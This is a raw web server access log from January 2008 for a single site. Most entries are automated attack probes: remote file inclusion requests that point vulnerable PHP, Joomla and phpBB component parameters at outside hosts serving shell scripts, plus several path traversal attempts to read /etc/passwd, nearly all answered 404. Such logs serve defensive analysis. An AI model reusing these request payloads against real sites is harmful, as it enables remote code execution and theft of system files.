67.15.10.8 - - [25/Jan/2008:05:31:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:35:53 -0800] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:35:53 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:35:54 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [25/Jan/2008:05:38:03 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.10.8 - - [25/Jan/2008:05:39:06 -0800] "GET /logs/access_071222.log/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.10.8 - - [25/Jan/2008:05:39:27 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.126 - - [25/Jan/2008:05:40:20 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.129.193.100 - - [25/Jan/2008:05:40:55 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.129.193.100 - - [25/Jan/2008:05:40:55 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.208.81.132 - - [25/Jan/2008:05:42:00 -0800] "GET /page.php?s=http://articlesearcheng.com/backup/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.25.169 - - [25/Jan/2008:05:42:43 -0800] "GET /logs/access_071224.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [25/Jan/2008:05:42:43 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:42:51 -0800] "GET //skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:44:08 -0800] "GET /logs/access_071121.log//components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [25/Jan/2008:05:44:27 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.52.130 - - [25/Jan/2008:05:44:35 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anamer.com/esupportv2.2.opened.ioncube/upload_ioncube/admin/.r/vampire.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.52.130 - - [25/Jan/2008:05:44:35 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anamer.com/esupportv2.2.opened.ioncube/upload_ioncube/admin/.r/vampire.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:45:51 -0800] "GET /logs/access_071229.log//login.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:45:51 -0800] "GET /logs//login.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.129.193.100 - - [25/Jan/2008:05:46:43 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
216.129.193.100 - - [25/Jan/2008:05:46:43 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.194.71.79 - - [25/Jan/2008:05:46:52 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:05:47:16 -0800] "GET //skin/zero_vote/error.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.26.216.70 - - [25/Jan/2008:05:48:54 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
81.26.216.70 - - [25/Jan/2008:05:48:55 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
69.89.25.169 - - [25/Jan/2008:05:49:04 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [25/Jan/2008:05:49:05 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.151.32 - - [25/Jan/2008:05:51:02 -0800] "GET /logs/info.php?tabla=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.31.151.32 - - [25/Jan/2008:05:51:02 -0800] "GET /info.php?tabla=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.6.22.126 - - [25/Jan/2008:05:51:08 -0800] "GET /funny/?S=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:05:51:58 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:05:51:59 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:05:52:21 -0800] "GET /logs/access_071229.log//login.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:05:52:22 -0800] "GET /logs//login.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:52:27 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:52:29 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:52:29 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:52:29 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.129.193.100 - - [25/Jan/2008:05:54:08 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
216.129.193.100 - - [25/Jan/2008:05:54:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
216.129.193.100 - - [25/Jan/2008:05:54:11 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.129.193.100 - - [25/Jan/2008:05:54:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
69.89.25.169 - - [25/Jan/2008:05:54:14 -0800] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:54:53 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:05:54:57 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:05:55:08 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:05:55:41 -0800] "GET /logs/access_071220.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:05:55:47 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:05:55:49 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.52.130 - - [25/Jan/2008:05:56:27 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anamer.com/esupportv2.2.opened.ioncube/upload_ioncube/admin/.r/vampire.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:05:59:10 -0800] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [25/Jan/2008:06:01:14 -0800] "GET /logs/access_071229.log/page.php?s=http://articlesearcheng.com/backup/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [25/Jan/2008:06:01:14 -0800] "GET /logs/page.php?s=http://articlesearcheng.com/backup/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:01:18 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:01:18 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:01:18 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:01:19 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:01:19 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:01:20 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:02:35 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:02:35 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:02:35 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:03:21 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:03:22 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:06:03:45 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:06:03:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [25/Jan/2008:06:04:22 -0800] "GET /logs/access_071224.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [25/Jan/2008:06:04:22 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [25/Jan/2008:06:04:23 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:06:04:25 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [25/Jan/2008:06:04:26 -0800] "GET /logs/access_071225.log//Classifieds/search/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [25/Jan/2008:06:04:27 -0800] "GET //Classifieds/search/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [25/Jan/2008:06:04:27 -0800] "GET /logs//Classifieds/search/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:06:05:44 -0800] "GET /logs/access_080106.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:06:05:44 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:06:05:45 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [25/Jan/2008:06:05:53 -0800] "GET /logs/access_071229.log//login.php?dir=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [25/Jan/2008:06:05:53 -0800] "GET /logs//login.php?dir=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:06:06:26 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:06:06:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [25/Jan/2008:06:06:50 -0800] "GET /logs/access.log//Classifieds/search/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [25/Jan/2008:06:06:51 -0800] "GET //skin/zero_vote/error.php?dir=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:06:07:37 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:06:08:10 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:06:08:58 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:06:08:59 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:06:08:59 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.208.81.132 - - [25/Jan/2008:06:12:45 -0800] "GET /page.php?s=http://www.naimaa.com/templates/r00t/safeoff.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:06:14:22 -0800] "GET /logs/access_071110.log//photoalb/lib/static/header.php?set_menu=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:06:14:28 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.20 - - [25/Jan/2008:06:15:16 -0800] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
64.185.237.20 - - [25/Jan/2008:06:15:17 -0800] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:06:16:21 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:06:16:21 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:06:16:22 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:17:36 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:17:36 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:17:36 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:17:40 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.10.8 - - [25/Jan/2008:06:20:46 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.44.91 - - [25/Jan/2008:06:22:32 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:06:22:38 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [25/Jan/2008:06:25:12 -0800] "GET //index.php?body=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
200.55.196.91 - - [25/Jan/2008:06:25:12 -0800] "GET /logs//index.php?body=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:06:25:34 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:06:25:37 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:06:25:38 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.10.8 - - [25/Jan/2008:06:26:42 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.222.131.65 - - [25/Jan/2008:06:27:04 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.10.8 - - [25/Jan/2008:06:27:52 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:28:07 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:06:28:08 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:28:08 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:28:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
